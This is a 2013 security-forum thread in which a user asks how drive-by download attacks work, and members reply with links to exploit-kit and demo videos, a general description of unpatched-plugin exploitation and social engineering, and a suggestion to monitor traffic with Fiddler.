Full understanding specific "Drive-by download" behavior

A

ansar313

New Member
Thread author
May 20, 2013
14
Hello to all,
I have little skill in English writing.excuse me :)
I am trying to understand a specific malware behavior that is used by "Drive-by downloads".
specially this questions:
1.What file is downloaded in attack ?
2. What exploit is used to attack ?
3. What domain is redirected and etc
for example in BLADE evaluation lab, some malware URL listed that use Drive-by download.
http://www.blade-defender.org/eval-lab/
i want to understand the exact attack scenario step by step of each url that list in BLADE

Notice: there are many website that make report with full detail but they don't say the mechanism. Please help me!
 
Jack

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,379
RE: full understanding specific Drive-by download behavior

Here is how a drive-by download and exploit work to infect internet users:

The Blackhole Exploit Kit

iFrame drive-by attack demo
[video=youtube]http://www.youtube.com/watch?&v=_cBed6-ufIQ[/video]
Adobe reader vulnerability demo
 
Last edited:
A

ansar313

New Member
Thread author
May 20, 2013
14
RE: full understanding specific Drive-by download behavior

dear jack
thanks a lot
but my question is some thing else
is there software or web site that we can give it a malware url and it give us a report that describe attack scenario step by step?
please help me
 
I

Ink

Administrator
Verified
Jan 8, 2011
22,489
I believe a Drive-By-Download relies on vulnerabilities where the targeted software has an unpatched/open exploit ie. IE6, older Flash Player or Java (plus many other software) and a specially crafted webpage takes advantage of it, and without user interaction.

Other forms, could be using Social Engineering, by tricking the user into downloading files and luring them to executing them (ie. double extension)

However, Modern browsers today will provide Anti-Phishing/Malware Protection and keeping your Plugins updated, help keep your PC secure against the latest attacks.

PS: Correct me if I'm wrong.
 
jamescv7

jamescv7

Level 85
Verified
Honorary Member
Mar 15, 2011
13,070
Files downloaded are first temp files whick likely a legit, then drops others until an executable appeared.

Using a program like Fiddler can monitor its modification om that type attack.
 
You must log in or register to reply here.

Similar threads

Andy Ful
    • Like
    • +Reputation
    • Hundred Points
Serious Discussion Machine Learning for Malware Detection (KasperskyLab)
Replies
4
Views
813
General Security Discussions
Andy Ful
Andy Ful
lokamoka820
    • Like
    • Applause
Hot Take How to restore the full date and time format on Windows 11's taskbar
Replies
1
Views
342
Windows 11
Bot
Bot
silversurfer
    • Like
New Update Opera One for iOS updated with AI-based Image Understanding capabilities
Replies
0
Views
354
Opera
silversurfer
silversurfer

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top